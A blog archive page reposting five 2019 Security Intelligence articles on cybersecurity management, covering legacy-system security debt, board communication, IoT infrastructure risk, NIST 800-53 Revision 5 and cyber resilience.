While it’s well-known that updating software is a key part of keeping the organization secure, this is not always practical. Most companies have legacy technology that must be kept for one reason or another, often because it’s too expensive or difficult to replace. Millions of computers are still using antiquated software, much of which is known to be problematic. For example, according to Statcounter, Windows XP still has around 2 percent of the global desktop Windows version market share, and Windows 7 — which will no longer be supported after 2019 — still has around 34 percent.

Even code that’s current, has been in use for years and is considered safe can sometimes hide major problems. There are plenty of examples from recent years in which vulnerabilities were found in code that was in active use for years or even decades, such as Heartbleed, Shellshock, Meltdown and Spectre.

From a return on investment (ROI) perspective, it makes sense for criminals to spend as little time and effort as possible creating new attacks when existing problems can easily be exploited. Old malware and vulnerabilities linger on a surprising number of systems.

Old Attack Types Resurface

Threat actors aren’t just recycling old vulnerabilities and malware; they are also fond of reusing old attack vectors, particularly those that have been off the industry’s radar for so long that we forget they’re a problem.

For example, boot sector viruses and macro viruses were once considered all but dead, as heuristic detection became so effective that even brand new malware was usually identified as soon as it was released. But once attackers rediscovered these techniques, a new generation of malware researchers had to resurrect skills from the past to reverse engineer these threats. As Krebs on Security reported last year, even malware sent by snail mail has made a bizarre reappearance.

The Pattern Repeats in New Devices

Sometimes old attacks are ported to new operating systems and devices, which are perceived as less threat-prone than more traditional computers. Malware authors have had years of practice porting Windows threats to other operating systems, and attacks have been carried out on everything from mobile phones to internet-connected refrigerators.

Researchers have been predicting internet of things (IoT) security issues for almost 20 years, due in large part to device manufacturers failing to learn the lessons of the past. Yet many “smart” devices fail to follow basic IoT security best practices, including using default login credentials and failing to include software update capabilities.

Start Addressing Security Debt With Ongoing Risk Assessments

The good news is that many of the techniques that help with addressing security debt will also help mitigate the problems that could come with new threats. Perhaps the best strategy is to conduct thorough and ongoing risk assessments to identify which assets and vulnerabilities are present in your environment. You can then move on to mitigating the biggest risks for different kinds of devices and code.

For Old Code or Devices

Identify and update what you’re able to. For things that you’re unable to update, it’s best to harden the machines as much as possible and monitor them closely. This hardening may include segregating these devices from the rest of your network, limiting the privileges of the device and/or using white lists.

For Newer IoT Devices

If at all possible, purchase devices that were built with security in mind. This should include, at a minimum, the ability to change usernames and passwords as well as software update mechanisms. Ask vendors to practice security by design principles as outlined by the Open Web Application Security Project (OWASP). You can also put risky devices on segregated portions of your network while monitoring traffic in and out of these areas.

For Everything Else

New devices with updated software can still fall victim to old attack techniques. It’s important to make sure you’re covering the basics, such as practicing good password hygiene and using a reputable security suite. But there are other protection steps you should also be taking.

For instance, use layers of defense wherever possible, such as multifactor authentication to protect login credentials rather than just a username and password. Set security policies and procedures and make sure your users are briefed on them early and often. Tailor your practices so that the people in your environment are able to do what they need to without undue trouble, but also without allowing more privileges than are truly necessary.

Invest Wisely to Combat Both Old and New Threats

Protecting a network can be a costly and difficult endeavor if you apply tools blindly in fear of future problems. Spend your security investments more wisely by regularly and thoroughly assessing which assets you have to protect and mitigate any risks to those assets — whether they’re old or new vulnerabilities. You don’t need to have the most newfangled technology to make your environments an unattractive target for cybercriminals.

The post To Move Forward Securely, Look Backward With Ongoing Risk Assessments appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Lysa Myers

April 2, 2019

Business Continuity, C-Suite, Chief Information Officer (CIO), Chief Information Security Officer (CISO), CISO, cyber risk, Governance, Incident Response (IR), Risk, Risk Management, Security Leadership, Security Spending,

The Language of Business: Where the Board of Directors and Security Leaders Can Meet

A few years back, a business association asked me to deliver a cybersecurity presentation. I knew some in attendance would report back to their respective board of directors, and I expected it to be a challenging session because cybersecurity knowledge and literacy would be all over the map.

It’s a situation I’ve encountered regularly. I remember in one session with about 40 people, I asked what they thought “cybersecurity” meant. Somehow, I think I got 45 different answers. Even within an organization’s board of directors, people who absolutely need to be part of the cybersecurity conversation today, you’d likely get the same variance in responses.

But I welcomed the session because it gave me an opportunity to pilot a new presentation tactic. The presentation focused more on business in general and business development as opposed to cybersecurity, and the presentation style was so outside-the-box, I was actually nervous.

To Engage the Board, Talk Business, Not Cybersecurity

Going in, I knew some of the attendees expected to hear some cybersecurity techno-babble. I did none of that. Instead, I used the simplest possible language and cartoons to disarm these senior leaders for one reason: I wanted them to feel comfortable and able to talk freely about that bogeyman topic, cybersecurity.

By focusing on business and risk instead of cybersecurity, everybody in the room was fully tuned in. Cybersecurity was just color.

You see, by avoiding the technical nature of cybersecurity, the participants made the mental jump from “cybersecurity as an IT issue” to “cybersecurity as a business and risk issue.” They saw how cybersecurity issues could impact and influence their business development plans or pose growth problems. I remember one participant emphatically saying to the group, “You just made me understand this cybersecurity thing isn’t my IT department’s problem … it’s my problem!”

And just like that, you have a new teammate.

CSOs Are From Mars, CISOs Are From Venus and the Board of Directors Are From Andromeda

There has been a great deal of discussion on whether you should have a chief information officer (CIO), chief security officer (CSO) or chief information security officer (CISO), who should do what, what reporting chains should look like, and the need for this type of specialist. The good news is that there is increased interaction between these security leaders and CEOs and the board of directors. It’s a step in the right direction.

But interaction is not enough; it’s speaking the same language that matters. To do that, you actually need to know what you’re in the business of. No two organizations are alike.

As a general observation, I’ve found that security professionals sometimes have difficulty understanding what drives business in their organization. Reading financial statements and appreciating the importance of cash flow may not be a core competency of security teams, but in practice, they should be.

The same can be said for understanding supply chains, knowing who the key customers and vendors are, and determining which costs can really impact the organization’s ability to generate revenue or meet its business mission. These are all issues that senior leaders and the board of directors care about.

Now, these same issues do not necessarily fall within a security professional’s area of responsibility, but the ability to demonstrate business acumen gives the security professional incredible influence with these other players. Therefore, if security employees can demonstrate that they have more than a one-track mind, they may suddenly find more allies within the organization.

Your Job Is to Keep the Business Going

To keep the business going, you need to know how it works. That’s why asking the right business operations questions will make all the difference. You shouldn’t be asking your colleagues, “How long can you go without a computer?” (The answer almost certainly will be, “I can’t.”) Instead, you should be asking, “You don’t have a computer for 72 hours, how do we keep the business going?” Or, “If we lose network capability for 48 hours, how do we survive the downtime?” You get the idea. Note the emphasis on teamwork.

Ask the right questions the right way and you’ll be better prepared to:

Handle and manage cyber incidents and disruptions;
Meet the day-to-day needs of the organization; and
Understand the primary drivers of the business.

To Improve Your Cybersecurity Posture, You Need to Understand the Business

Most successful business leaders understand that rocky times are part of the normal business cycle. The best even expect rocky times, especially during business development phases. That’s not what worries them.

What worries them is if the organization has the ability and resources to weather the storm. For this reason alone, IT and security professionals need to be able to talk business to the C-suite and the board of directors, especially if new security products need to be added into the organization’s portfolio.

Make Life Easy for Your Board of Directors

With increased pressure on the board of directors to play a more active role in cyber risk governance, it is incumbent on internal cybersecurity professionals to learn what makes the organization tick by talking return on investment, cost, growth metrics, cash flow, business development, resource management and so on. If you can speak the language of business, you are better positioned to demonstrate the value of cybersecurity investments to senior leaders. You’re making their life easier, which in turn makes your life easier.

So whether it’s a few online business basics and governance courses or talking with your nonsecurity colleagues about what drives the business, it’s a worthwhile investment in the grand scheme of things.

I understand these business spaces can sometimes make security employees uncomfortable. But if you can master the business language, you’ll suddenly find yourself not galaxies apart from your C-suite colleagues and board members, but rather in the same room, working together to meet the most pressing cybersecurity and business needs of the organization. That’s a good place to be.

The post The Language of Business: Where the Board of Directors and Security Leaders Can Meet appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: George Platsis

March 29, 2019

Artificial Intelligence (AI), Chief Information Security Officer (CISO), Connected Devices, Data Privacy, Data Protection, Endpoint Protection, Internet of Things (IoT), IoT Security, IT Infrastructure, Machine Learning, Network Security, Payment Card Industry (PCI), Risk Management,

A Busy IT Infrastructure Can Lead to Security Disaster

Who doesn’t love new technology, especially when it promises to make tasks easier and improve productivity? That eagerness to add new technology — something IT staff often encourages security leadership to do — has led to the digital transformation, the use of digital technology to solve problems. Smartphones, tablets and cloud computing have been leading the way in the workplace’s digital makeover, but the growing popularity of the internet of things (IoT) could totally change the look of IT infrastructure.

However, digital transformation isn’t all fun and games for security staff. While security teams may enjoy new technology, it can also add cybersecurity complications, particularly when these technologies share an infrastructure.

The PCI-Compliant Vending Machine

During his keynote address at CPX 360 in February, Jeff Schwartz, vice president of North American engineering at Check Point, told a story of the upgraded break room vending machine. Because fewer people carry paper money or loose change, a company decides to upgrade its snack machine to take credit cards. That’s great news for the employee who wants his or her 3 p.m. chip fix but only uses plastic to pay.

However, as Schwartz pointed out, now that the vending machine accepts credit cards, it must follow payment card industry (PCI) compliance standards. If that gets overlooked, the vending machine could end up costing the company in fines. The vending machine will also be hooked up to the internet so it can process the transactions. Now it is at risk of being hacked. If the vending machine is hacked, it opens a door for threat actors to enter your network.

So, what initially looked like a convenience turned into a security headache. With the growth of the IoT and digital transformation, expect this to become a burgeoning risk vector. As Schwartz told his audience, shared resources and IT infrastructure create more opportunities to lose data.

Increased Reliance on Technology Impacts Risk

Simply put, new technology almost always has an impact on risk. New endpoints offer new potential openings for threat actors to exploit. That’s not saying that we don’t need or want the technology; instead, to better secure networks and data, we need to better understand what’s going on with those new endpoints.

With the IoT, devices, appliances and machinery we once never gave a second thought to are all now connected to the internet — but what do you know about that connectivity? New elevators are now smart elevators, for example, so not only are they adding another endpoint to your network, they are also collecting data.

A device such as an elevator is likely controlled by a third party, meaning that they also have access to the network and data. If the building is shared by a dozen companies, you add in a mixture of data and networks. Who is in charge of the security for the elevator? Who is responsible for the data collected and its protection? What do you know about the elevator company’s security practices? Did you even think you had to worry about the elevator?

Be Mindful of Customer Data

Digital transformation is accomplished not just with business efficiency in mind, but also for customer convenience. In fact, your customers want an easier interaction with your company, and that often comes through technologies such as artificial intelligence (AI), machine learning (ML) and the IoT. Customer-facing AI, such as chatbots, can improve customer communications, for example.

“Customer expectations are far exceeding what you can really do,” George Westerman, principal research scientist with the MIT Sloan Initiative on the Digital Economy, told CIO. “That means a fundamental rethinking about what we do with technology in organizations.”

So, yes, customers have high expectations for the technology your company uses to facilitate better consumer relationships. However, thanks to high-profile data breaches and increasing awareness about data privacy regulations, customers also want to make sure their data is safe. In fact, Schwartz noted in his speech that you shouldn’t be surprised if consumers begin to make their purchasing decisions based on the way your company collects, uses and stores customer data.

Are You in Control of Your IT Infrastructure?

This takes us back to shared IT infrastructure. It isn’t a matter of knowing what endpoints are on the network and collecting data, but how those endpoints have shifted as technology shifts. Having a coffee pot operated by an app is a great convenience for your staff, but how does that impact data gathering? Same with that chatbot: It is certainly a convenient and perhaps cost-efficient way to build customer relations, but your security team better know how the conversations are collected and how the company uses that data or it could turn into a privacy nightmare.

We are still learning how much information sharing is happening on some infrastructures. For example, a smart TV may be an excellent way for an organization to view sensitive corporate or consumer (e.g., a patient in a hospital room) information, but at the same time, employees (or that patient) could use that same TV to tune into their Netflix or Hulu account during their lunch break. Suddenly, you have corporate data mingling with personal data. If it turns out that Netflix is the victim of a data breach, that sensitive corporate data is now at risk.

The more common the IoT and other emerging technologies become in the workplace, the more chief information security officers (CISOs), IT leaders and other decision-makers will need to consider the overall impact of every device using that IT infrastructure. It isn’t a matter of what is connected to your network, but how it is connected and whether you are able to control that connection’s security.

The post A Busy IT Infrastructure Can Lead to Security Disaster appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Sue Poremba

March 29, 2019

Chief Information Officer (CIO), Chief Information Security Officer (CISO), CISO, Compliance, Cybersecurity Framework (CSF), Cybersecurity Legislation, Data Privacy, Data Protection, Privacy, regulatory compliance, Risk Management, Security Leaders, Security Leadership,

Adopting the NIST 800-53 Control Framework? Learn More About the Anticipated Changes in 2019

The final version of the National Institute of Standard and Technology (NIST)’s Special Publication (SP) 800-53 Revision 5 is on the horizon for 2019. What does the initial public draft tell us about what we can expect in its final version? Even more importantly, what does it mean for organizations seeking to adopt the new guidelines?

NIST SP 800-53 Revision 5 is expected to deliver major updates to the existing fourth revision, which was originally published in 2013. Since its inception, this publication has been the de facto guideline for security control implementations, security assessments and Authorization to Operate (ATO) processes for government information systems. There are many draft changes in the fifth revision, but one of the most significant impacts is that it marks a departure from limiting the control sets to federal information systems. The framework is now recommended for all systems in all industries.

In addition to control baseline updates, other major changes NIST anticipates will be in the final version include:

Organizations must now designate a senior management official responsible for managing the security policies and procedures associated with each control family.
Changing the structure of the controls to be more outcome-based, which leads to increased clarity, consistency and understanding.
Full integration of privacy controls into the security control catalog to create a consolidated view of all controls.
The addition of two new privacy control families: Individual Participation (IP) and Privacy Authorization (PA).
Program Management (PM) control family nearly doubles in scope (includes additional emphasis on privacy and data management).
New appendices to detail the relationship between security and privacy controls.

What Will NIST 800-53 Rev. 5 Mean For Organizations?

The changes expected in the fifth revision touch on a variety of subjects and affect a wide range of business and security functions. Below are some areas that will be particularly affected and considerations that will have a significant impact on how organizations manage their security programs.

Senior Management Ownership

First and foremost, leadership accountability is given much greater emphasis across the framework. Organizations will need to identify key senior management personnel to own specific policy efforts and oversight actions for the life of each system. By driving accountability from the top down, organizations stand to benefit from executive sponsorship of security policies and gain better visibility into the effectiveness of governance controls and the organization’s overall security status.

Data Privacy

Dedicated privacy control families and new privacy guidance woven into existing controls drive greater focus on privacy and sensitive data management. Privacy needs to be ingrained into all aspects of cybersecurity now and in the future, especially with new regulations in place to protect personal data. Organizations may need to review their org chart to ensure it provides the most effective strategic alignment between C-suite, security and privacy teams. Ownership of control implementations between security and privacy will be a key decision point when transitioning to the final release of Revision 5 in the near future.

Third-Party Assessments

NIST SP 800-53A will undergo a fifth revision in conjunction with the updates to SP 800-53. This is the companion document third-party assessors use as part of the ATO process to determine the effectiveness of control implementations and evaluate risk posture. Implementing and adapting the updated controls will be crucial to new or existing ATO renewals in the long term.

How Can Business Leaders Enhance Security Over Time?

Chief information officers (CIOs), chief information security officers (CISOs) and other organizational leaders need to start thinking about how to advance security and privacy initiatives in unison to achieve business goals and manage risk effectively. The update to NIST 800-53 will affect each organization differently. It’s still important to perform due diligence to determine how the final changes apply in each unique situation; however, as a whole, adopting recommended guideline serves to unify security standards and help all organizations strengthen their security posture as the threat and regulatory landscapes evolve.

Additional information and the full list of changes in the NIST 800-53 Revision 5 draft can be found on the NIST website, along with the publication schedule.

The post Adopting the NIST 800-53 Control Framework? Learn More About the Anticipated Changes in 2019 appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Jason Yakencheck

March 25, 2019

Chief Information Security Officer (CISO), Collaboration, cyber resilience, cyber risk, Governance, Incident Response (IR), IT Infrastructure, Risk Management, Security Leadership, Threat Detection, Threat Sharing,

Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

In February 2019, the World Economic Forum (WEF) released a special report titled “Cyber Resilience in the Electricity Ecosystem: Principles and Guidance for Boards,” which supplements a prior report on cyber resilience issued in 2017. In light of the interconnectedness of organizations and ecosystems today, I’d argue that the report’s main principles can apply well beyond the electrical industry. Examples of other ecosystems that could be severely disrupted — or, worse, catastrophically impacted — by cyberattacks or cyber failures include the global banking sector, global stock exchanges, and the transportation sector and its supporting infrastructure.

We Need a Systemwide View of Resilience

Of course, it is easier to mentally conceive of the impacts of cyber risks on the electrical grid as they relate to our way of life; many of us have had the displeasure of living through a blackout, where the noise of our busy lives suddenly makes way to the deafening silence of a powered-down world. However, as organizations begin to understand and take stock of the interconnectedness of their supply chains and the intricate nature of their business partnerships, the cyber risk discussion must evolve from internally focused defenses and reactions into a larger systemwide view of resilience.

To help guide global stakeholders — government leaders, boards of directors, top leadership, and IT and security leaders — the WEF resilience report provides a number of principles that organizations should follow and governments should keep a close eye on. Failure to act now, while we still can — and can do so at a reasonable cost — could lead to systemic shocks and engender cascading failures on a scale never seen before.

While the idea of “stress tests” has been used many times in the financial sector, its applicability to our connected world is long overdue. But it all starts at the top, with a strong governance principle.

The Governance of Cyber Resilience

Over the past decade, there has been a shift in the boardroom to pay increasing attention to the issues of cybersecurity and cyber risks. Instead of leaving those issues for IT to deal with, board directors have rightfully become more engaged in overseeing management’s activities and, by extension, ensuring that the organization is as cyber resilient as it needs to be.

At the board level, resilience in the cyber realm isn’t about asking, “Are we doing something?” or, “What are we doing?” but rather, “How well are we doing?” and, “How do we know we would be able to recover from a cyber outage?” The WEF report provides several questions for boards to ask of top leadership and chief information security officers (CISOs), such as:

How much operational technology (OT) do we have? How much crossover is there between OT, IT and physical security? Could an issue in one domain move into another?
Have roles and responsibilities for each area — resilience for IT, OT and physical — been defined? How well do these areas collaborate or integrate with one another, as opposed to operating in silos?
What processes and structures are in place to “ensure a coordinated cyber resilience strategy” across the organization?

For the CISO, this is an opportunity to be more of a strategic partner and adviser to top leadership and the board, to shed much-needed light on just how well the organization is prepared to detect, contain and recover from a cyber disruption. However, having the board’s support is key to helping the CISO break what are otherwise longstanding barriers and the “this is how we’ve always done it” attitude. With that support, the CISO can work to integrate cyber risk management into all business decisions.

Resilience by Design

One of the most striking differences between IT and OT is their very different design imperatives. Most of IT was designed with short component lifetimes (3–5 years), a preference for confidentiality (at least when compared to expectations for OT components), and expectations that delays, while inconvenient, are part of the IT ecosystem as components are replaced, upgraded or simply patched.

By contrast, OT components are designed to last 10 to sometimes 20 years, with high-availability requirements under near real-time conditions, meaning there’s never a good time to take OT systems down for maintenance or patching.

It is thus critical to design and deploy cyber resilient components for new IT and OT systems and closely monitor existing systems already in place. On this front, board directors are told to ask questions such as:

How are cyber risks considered and accounted for at the onset of new projects and in current operations, across the business?
How does management ensure that appropriate controls have been put in place, and how is the effectiveness of those controls evaluated and monitored? Just how cyber resilient are current systems?
How does leadership communicate the importance of cyber resilience throughout the organization and enable cross-functional information flows?

The good news is that boards and management can empower their CISO and the rest of the security function to take the lead on providing answers to these questions. The bad news is that looking at the organization as an island isn’t the right approach; we must consider the whole ecosystem.

Reciprocal Impacts Between Organizations and Ecosystems

Boards are also coming to grips with the reality that compliance isn’t sufficient to safeguard their organization’s operations and profits given the complex, highly interconnected ecosystems they operate within. With this realization, boards are asking better questions and engaging in enterprise risk conversations to drive important topics, such as the availability and distribution of security resources and budgets, and a more holistic approach to enterprise risk management that goes beyond compliance to also include risk appetite and alignment with organizational goals and strategy.

Beyond the internal focus, boards are also asking top leadership to look outward, to ensure that management is aware and understands how changes and disruptions in the ecosystem can impact the organization and, conversely, how disruptions in the organization’s own IT and OT could impact the wider ecosystem.

This focus goes beyond the routine of third-party vendor assessments and the management of those particular risks to include a broader view of the risks posed to the organization by the ecosystem and vice versa: highest external risks and their impacts, reputational risks, external dependencies and procurement process agility, testing and integration of new systems, and preparedness against cascading failures originating outside the organization.

Collaborate and Test Across Your Ecosystem

With the realization that “we’re all in this together,” boards want to learn how effectively their organizations are collaborating with the rest of the ecosystem in planning and testing cyber resilience. What mechanisms are in place to share best practices and alerts (e.g., the various Information Sharing and Analysis Centers in the U.S.)? What government resources or bodies are available to interface with? How does management ensure that it is aware of relevant information that may be shared with the organization via those channels? How is information received through such channels used for strategic decisions by management?

A clear example of this commitment to collaboration across the ecosystem for the betterment of all is the Charter of Trust, which leading global companies such as Siemens, Airbus, Allianz, Daimler and IBM have signed on to as a way “to strengthen trust in the security of the digital economy.” The 10 principles outlined in the Charter of Trust are fully aligned with, and reinforce the commitment of, the management of each of those companies to creating a better, safer digital ecosystem for us all.

While collaboration and sharing of threat information and best practices is key, the entire ecosystem would be left in a highly fragile state if peers and competitors didn’t also collaborate to prepare and test their cyber resilience plans. Once again, the CISO is well-placed to be part of those discussions and exercises, to help evaluate just how well the ecosystem can respond to and recover from a cyber incident.

Top leadership and board directors are coming to grips with the need for their organizations — together with their peers and competitors in the ecosystem — to be more resilient to cyber attacks and disruptions. CISOs, who now have a seat at the table, must play a leading role in this effort.

The post Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Christophe Veltsos

March 22, 2019

Older Posts